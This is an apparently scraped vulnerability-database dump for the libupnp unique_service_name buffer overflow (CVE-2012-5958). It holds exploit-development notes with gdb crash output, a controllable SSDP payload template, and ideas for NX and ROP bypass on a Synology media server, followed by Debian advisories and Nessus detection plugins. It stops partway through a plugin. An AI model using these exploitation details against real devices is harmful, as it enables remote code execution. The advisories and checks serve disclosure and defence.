std::string::_M_leak_hard(void)\n .got.plt:080BA50C off_80BA50C dd offset _ZN11MediaServer13StringReplaceESsSsSs\n .got.plt:080BA50C ; DATA XREF: MediaServer::StringReplace(std::string,std::string,std::string)r\n .got.plt:080BA50C ; MediaServer::StringReplace(std::string,std::string,std::string)\n .got.plt:080BA510 off_80BA510 dd offset ixmlLoadDocumentEx\n .got.plt:080BA510 ; DATA XREF: _ixmlLoadDocumentExr\n .got.plt:080BA514 off_80BA514 dd offset pcre_study ; DATA XREF: _pcre_studyr\n .got.plt:080BA518 off_80BA518 dd offset UpnpRegisterRootDevice\n .got.plt:080BA518 ; DATA XREF: _UpnpRegisterRootDevicer\n .got.plt:080BA51C off_80BA51C dd offset _ZN14SynoAudioUtils16RadioGetStationsEjiiRSt6vectorINS_12RadioStationESaIS1_EERi\n .got.plt:080BA51C ; DATA XREF: SynoAudioUtils::RadioGetStations(uint,int,int,std::vector<SynoAudioUtils::RadioStation,std::allocator<SynoAudioUtils::RadioStation>> &,int &)r\n .got.plt:080BA51C ; SynoAudioUtils::RadioGetStations(uint,int,int,std::vector<SynoAudioUtils::RadioStation,std::allocator<SynoAudioUtils::RadioStation>> &,int &)\n .got.plt:080BA520 off_80BA520 dd offset memset ; DATA XREF: _memsetr\n .got.plt:080BA524 off_80BA524 dd offset _ZSt20__throw_out_of_rangePKc\n .got.plt:080BA524 ; DATA XREF: std::__throw_out_of_range(char const*)r\n .got.plt:080BA524 ; std::__throw_out_of_range(char const*)\n .got.plt:080BA528 off_80BA528 dd offset strncasecmp ; DATA XREF: _strncasecmpr\n .got.plt:080BA52C off_80BA52C dd offset _ZN4Json5ValueD1Ev\n .got.plt:080BA52C ; DATA XREF: Json::Value::~Value()r\n .got.plt:080BA52C ; Json::Value::~Value()\n .got.plt:080BA530 off_80BA530 dd offset _ZN7pcrecpp3Arg12parse_stringEPKciPv\n .got.plt:080BA530 ; DATA XREF: .plt:pcrecpp::Arg::parse_string(char const*,int,void *)r\n .got.plt:080BA530 ; pcrecpp::Arg::parse_string(char const*,int,void *)\n .got.plt:080BA534 off_80BA534 dd offset ixmlNamedNodeMap_getNamedItem\n .got.plt:080BA534 ; DATA XREF: _ixmlNamedNodeMap_getNamedItemr\n .got.plt:080BA538 off_80BA538 dd offset _ZNSs6assignEPKcj\n .got.plt:080BA538 ; DATA XREF: std::string::assign(char const*,uint)r\n .got.plt:080BA538 ; std::string::assign(char const*,uint)\n .got.plt:080BA53C off_80BA53C dd offset _ZN11MediaServer7MediaDB20AddExcludeVideoCodecESs\n .got.plt:080BA53C ; DATA XREF: MediaServer::MediaDB::AddExcludeVideoCodec(std::string)r\n .got.plt:080BA53C ; MediaServer::MediaDB::AddExcludeVideoCodec(std::string)\n .got.plt:080BA540 off_80BA540 dd offset lseek64 ; DATA XREF: _lseek64r\n .got.plt:080BA544 off_80BA544 dd offset _ZNSt9basic_iosIcSt11char_traitsIcEE4initEPSt15basic_streambufIcS1_E\n .got.plt:080BA544 ; DATA XREF: std::basic_ios<char,std::char_traits<char>>::init(std::basic_streambuf<char,std::char_traits<char>> *)r\n .got.plt:080BA544 ; std::basic_ios<char,std::char_traits<char>>::init(std::basic_streambuf<char,std::char_traits<char>> *)\n .got.plt:080BA548 off_80BA548 dd offset _ZN7pcrecpp2RED1Ev\n .got.plt:080BA548 ; DATA XREF: pcrecpp::RE::~RE()r\n .got.plt:080BA548 ; pcrecpp::RE::~RE()\n .got.plt:080BA54C off_80BA54C dd offset _Unwind_Resume ; DATA XREF: __Unwind_Resumer\n .got.plt:080BA550 off_80BA550 dd offset _ZN11MediaServer14FileGetFileExtERKSs\n .got.plt:080BA550 ; DATA XREF: MediaServer::FileGetFileExt(std::string const&)r\n .got.plt:080BA550 ; MediaServer::FileGetFileExt(std::string const&)\n .got.plt:080BA554 off_80BA554 dd offset _ZN11MediaServer19FileGetPathBaseNameERKSs\n .got.plt:080BA554 ; DATA XREF: MediaServer::FileGetPathBaseName(std::string const&)r\n .got.plt:080BA554 ; MediaServer::FileGetPathBaseName(std::string const&)\n .got.plt:080BA558 off_80BA558 dd offset __strtoul_internal\n .got.plt:080BA558 ; DATA XREF: ___strtoul_internalr\n .got.plt:080BA55C off_80BA55C dd offset UpnpSetMaxContentLength\n .got.plt:080BA55C ; DATA XREF: _UpnpSetMaxContentLengthr\n .got.plt:080BA560 off_80BA560 dd offset _ZN11MediaServer7MediaDB14FetchMediaItemER21__tag_SYNO_MEDIA_INFO\n .got.plt:080BA560 ; DATA XREF: MediaServer::MediaDB::FetchMediaItem(__tag_SYNO_MEDIA_INFO &)r\n .got.plt:080BA560 ; MediaServer::MediaDB::FetchMediaItem(__tag_SYNO_MEDIA_INFO &)\n .got.plt:080BA564 off_80BA564 dd offset _ZNKSs5rfindEcj\n .got.plt:080BA564 ; DATA XREF: std::string::rfind(char,uint)r\n .got.plt:080BA564 ; std::string::rfind(char,uint)\n .got.plt:080BA568 off_80BA568 dd offset SYNOPlaylistRecFree\n .got.plt:080BA568 ; DATA XREF: _SYNOPlaylistRecFreer\n .got.plt:080BA56C off_80BA56C dd offset pthread_mutex_unlock\n .got.plt:080BA56C ; DATA XREF: _pthread_mutex_unlockr\n .got.plt:080BA570 off_80BA570 dd offset ixmlDocument_getElementsByTagName\n .got.plt:080BA570 ; DATA XREF: _ixmlDocument_getElementsByTagNamer\n .got.plt:080BA574 off_80BA574 dd offset _ZN11MediaServer7MediaDB6SelectERKSsS2_iiS2_\n .got.plt:080BA574 ; DATA XREF: MediaServer::MediaDB::Select(std::string const&,std::string const&,int,int,std::string const&)r\n .got.plt:080BA574 ; MediaServer::MediaDB::Select(std::string const&,std::string const&,int,int,std::string const&)\n .got.plt:080BA578 off_80BA578 dd offset ixmlNodeList_free\n .got.plt:080BA578 ; DATA XREF: _ixmlNodeList_freer\n .got.plt:080BA57C off_80BA57C dd offset __cxa_throw ; DATA XREF: ___cxa_throwr\n .got.plt:080BA580 off_80BA580 dd offset _ZN4Json5ValueixEPKc\n .got.plt:080BA580 ; DATA XREF: Json::Value::operator[](char const*)r\n .got.plt:080BA580 ; Json::Value::operator[](char const*)\n .got.plt:080BA584 off_80BA584 dd offset printfPQExpBuffer\n .got.plt:080BA584 ; DATA XREF: _printfPQExpBufferr\n .got.plt:080BA588 off_80BA588 dd offset UpnpAddVirtualDir\n .got.plt:080BA588 ; DATA XREF: _UpnpAddVirtualDirr\n .got.plt:080BA58C off_80BA58C dd offset _ZN11MediaServer13DMSClientList7FindKeyERKSsS2_\n .got.plt:080BA58C ; DATA XREF: MediaServer::DMSClientList::FindKey(std::string const&,std::string const&)r\n .got.plt:080BA58C ; MediaServer::DMSClientList::FindKey(std::string const&,std::string const&)\n .got.plt:080BA590 off_80BA590 dd offset _ZN11MediaServer7MediaDBC1E21_tag_MEDIA_TABLE_TYPEP13DBConnect_tag\n .got.plt:080BA590 ; DATA XREF: MediaServer::MediaDB::MediaDB(_tag_MEDIA_TABLE_TYPE,DBConnect_tag *)r\n .got.plt:080BA590 ; MediaServer::MediaDB::MediaDB(_tag_MEDIA_TABLE_TYPE,DBConnect_tag *)\n .got.plt:080BA594 off_80BA594 dd offset _ZN11MediaServer16DMSClientChecker17ReleaseClientListEv\n .got.plt:080BA594 ; DATA XREF: MediaServer::DMSClientChecker::ReleaseClientList(void)r\n .got.plt:080BA594 ; MediaServer::DMSClientChecker::ReleaseClientList(void)\n .got.plt:080BA598 off_80BA598 dd offset _ZN4Json18StyledStreamWriter5writeERSoRKNS_5ValueE\n .got.plt:080BA598 ; DATA XREF: Json::StyledStreamWriter::write(std::ostream &,Json::Value const&)r\n .got.plt:080BA598 ; Json::StyledStreamWriter::write(std::ostream &,Json::Value const&)\n .got.plt:080BA59C off_80BA59C dd offset _ZN11MediaServer13StringImplodeERKSt6vectorISsSaISsEEPKc\n .got.plt:080BA59C ; DATA XREF: MediaServer::StringImplode(std::vector<std::string,std::allocator<std::string>> const&,char const*)r\n .got.plt:080BA59C ; MediaServer::StringImplode(std::vector<std::string,std::allocator<std::string>> const&,char const*)\n .got.plt:080BA5A0 off_80BA5A0 dd offset __gxx_personality_v0\n .got.plt:080BA5A0 ; DATA XREF: .plt:___gxx_personality_v0r\n .got.plt:080BA5A4 off_80BA5A4 dd offset pcre_free_substring_list\n .got.plt:080BA5A4 ; DATA XREF: _pcre_free_substring_listr\n .got.plt:080BA5A8 off_80BA5A8 dd offset pcre_exec ; DATA XREF: _pcre_execr\n .got.plt:080BA5AC off_80BA5AC dd offset UpnpDownloadXmlDoc\n .got.plt:080BA5AC ; DATA XREF: _UpnpDownloadXmlDocr\n .got.plt:080BA5B0 off_80BA5B0 dd offset read ; DATA XREF: _readr\n .got.plt:080BA5B4 off_80BA5B4 dd offset UpnpGetServerIpAddress\n .got.plt:080BA5B4 ; DATA XREF: _UpnpGetServerIpAddressr\n .got.plt:080BA5B8 off_80BA5B8 dd offset SLIBCErrGet ; DATA XREF: _SLIBCErrGetr\n .got.plt:080BA5BC off_80BA5BC dd offset _ZdlPv ; DATA XREF: operator delete(void *)r\n .got.plt:080BA5BC ; operator delete(void *)\n .got.plt:080BA5C0 off_80BA5C0 dd offset _ZNSt8ios_base4InitD1Ev\n .got.plt:080BA5C0 ; DATA XREF: sub_804D8E6:std::ios_base::Init::~Init()r\n .got.plt:080BA5C0 ; std::ios_base::Init::~Init()\n .got.plt:080BA5C4 off_80BA5C4 dd offset ParsePlayListByField\n .got.plt:080BA5C4 ; DATA XREF: _ParsePlayListByFieldr\n .got.plt:080BA5C4 _got_plt ends\n .got.plt:080BA5C4\n \n\n * Weird\u2026 maybe with other executables\u2026\n\n * When exploiting cve-2012-5958 with x86 / ubuntu 10.04 compilation to simulate the DSM \nenvironment its the register situation at overflow time:\n \n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb5fb6b70 (LWP 6628)]\n 0x00414141 in ?? ()\n (gdb) info registers\n eax 0x0\t0\n ecx 0xb5fb59e0\t-1241818656\n edx 0x0\t0\n ebx 0x42424242\t1111638594\n esp 0xb5fb5c30\t0xb5fb5c30\n ebp 0x42424242\t0x42424242\n esi 0x42424242\t1111638594\n edi 0x42424242\t1111638594\n eip 0x414141\t0x414141\n eflags 0x210282\t[ SF IF RF ID ]\n cs 0x73\t115\n ss 0x7b\t123\n ds 0x7b\t123\n es 0x7b\t123\n fs 0x0\t0\n gs 0x33\t51\n \n\nESP pointint to\n \n \n (gdb) x/xw $esp\n 0xb5fb5c30:\t0x09170ad8\n \n (gdb) x/s 0x09170ad8\n 0x9170ad8:\t \"uuid:schemas:device:\", 'B' <repeats 180 times>...\n \n\nThe contents contained at the pointer at esp can be easily controlled by doing something like\n \n \n \"ST:MSF1uuid:schemas:device:#{bof}:btw\\r\\n\" +\n \n (gdb) c\n Continuing.\n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb5f0fb70 (LWP 6729)]\n 0x00414141 in ?? ()\n (gdb) x/x $esp\n 0xb5f0ec30:\t0x09e97918\n (gdb) x/s 0x09e97918\n 0x9e97918:\t \"MSF1uuid:schemas:device:\", 'B' <repeats 176 times>...\n \n\n * If ASLR is disabled / unsupported (old kernels) and system() is mapped to a compatible address with goodchars, \nit could be used to NX bypass.\n\n * If ASLR is disabled and system isn\u2019t mapped to a compatible addresses, maybe wrappers can be found, for example, for the \ncase of the DMS Media Server, slibcsystem() (and other interesting wrappers for libc) are exported by libsynocore.so.3.1\u2026.. \nbut no luck when executing it into an Ubuntu 10.04 box (I guess mappings will be different on the original box, anyway in \nthe original box aslr is enabled):\n \n \n (gdb) disass 0x37d000 + 0x10EBC\n \n Dump of assembler code for function SLIBCSystem:\n 0x0038debc <+0>:\tpush %ebp\n 0x0038debd <+1>:\tmov %esp,%ebp\n 0x0038debf <+3>:\tpush %ebx\n \n\n * In order to run dms on an Ubuntu 10.04 box (easy way), just use the next ld config file: \n\n \n \n (gdb) disass 0x37d000 + 0x10EBC\n \n Dump of assembler code for function SLIBCSystem:\n 0x0038debc <+0>:\tpush %ebp\n 0x0038debd <+1>:\tmov %esp,%ebp\n 0x0038debf <+3>:\tpush %ebx\n \n\nand run ldconfig\n\n * ROP Gadgets can be searched with <http://www.vnsecurity.net/2010/08/ropeme-rop-exploit-made-easy/>, but some API pointers \nin compatible addresses are needed\u2026 tricky \n\n \n \n ROPeMe> generate /home/juan/DSM_40_X64_MediaServer/sbin/dms 5\n Generating gadgets for /home/juan/DSM_40_X64_MediaServer/sbin/dms with backward depth=5\n It may take few minutes depends on the depth and file size...\n Processing code block 1/1\n Generated 2492 gadgets\n Dumping asm gadgets to file: dms.ggt ...\n OK\n \n\n(Using dms because is no PIE compatible)\n", "modified": "2020-02-13T00:00:00", "published": "2013-01-31T00:00:00", "id": "AKB:8F0E9A23-04D0-42B5-9735-9BC6A4D70879", "href": "https://attackerkb.com/topics/3blYlvxFPa/upnp-unique-service-name-buffer-overflow", "type": "attackerkb", "title": "UPnP unique_service_name Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:12:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2615-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nFebruary 01, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libupnp4\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 \n CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965\nDebian Bug : 699459\n\nMultiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.8.0~svn20100507-1+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nWe recommend that you upgrade your libupnp4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-02-02T11:23:04", "published": "2013-02-02T11:23:04", "id": "DEBIAN:DSA-2615-1:87BCB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00019.html", "title": "[SECURITY] [DSA 2615-1] libupnp4 security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2614-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nFebruary 01, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libupnp\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 \n CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965\nDebian Bug : 699316\n\nMultiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.6-5+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nWe recommend that you upgrade your libupnp packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-02-02T10:17:57", "published": "2013-02-02T10:17:57", "id": "DEBIAN:DSA-2614-1:2F670", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00018.html", "title": "[SECURITY] [DSA 2614-1] libupnp security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:47:46", "description": "Multiple stack-based buffer overflows were discovered in libupnp4, a\nlibrary used for handling the Universal Plug and Play protocol. HD\nMoore from Rapid7 discovered that SSDP queries where not correctly\nhandled by the unique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built\non libupnp4 could generate a buffer overflow, overwriting the stack,\nleading to the daemon crash and possible remote code execution.", "edition": 17, "published": "2013-02-04T00:00:00", "title": "Debian DSA-2615-1 : libupnp4 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-04T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libupnp4"], "id": "DEBIAN_DSA-2615.NASL", "href": "https://www.tenable.com/plugins/nessus/64396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2615. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64396);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"DSA\", value:\"2615\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Debian DSA-2615-1 : libupnp4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple stack-based buffer overflows were discovered in libupnp4, a\nlibrary used for handling the Universal Plug and Play protocol. HD\nMoore from Rapid7 discovered that SSDP queries where not correctly\nhandled by the unique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built\non libupnp4 could generate a buffer overflow, overwriting the stack,\nleading to the daemon crash and possible remote code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libupnp4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2615\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libupnp4 packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1.8.0~svn20100507-1+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libupnp4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-dbg\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-dev\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libupnp4-doc\", reference:\"1.8.0~svn20100507-1+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:37", "description": "Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2013-02-21T00:00:00", "title": "Fedora 17 : mediatomb-0.12.1-23.fc17 (2013-2352)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:mediatomb"], "id": "FEDORA_2013-2352.NASL", "href": "https://www.tenable.com/plugins/nessus/64735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-2352.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64735);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"FEDORA\", value:\"2013-2352\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 17 : mediatomb-0.12.1-23.fc17 (2013-2352)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099069.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b261b399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediatomb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediatomb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"mediatomb-0.12.1-23.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediatomb\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:54:06", "description": "Updated libupnp packages fix security vulnerabilities :\n\nThe Portable SDK for UPnP Devices libupnp library contains multiple\nbuffer overflow vulnerabilities. Devices that use libupnp may also\naccept UPnP queries over the WAN interface, therefore exposing the\nvulnerabilities to the internet (CVE-2012-5958, CVE-2012-5959,\nCVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963,\nCVE-2012-5964, CVE-2012-5965).", "edition": 25, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : libupnp (MDVSA-2013:098)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:lib64ixml2", "p-cpe:/a:mandriva:linux:lib64threadutil6", "p-cpe:/a:mandriva:linux:lib64upnp6", "p-cpe:/a:mandriva:linux:lib64upnp-devel"], "id": "MANDRIVA_MDVSA-2013-098.NASL", "href": "https://www.tenable.com/plugins/nessus/66110", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:098. \n# The text itself is copyright (C) Mandriva 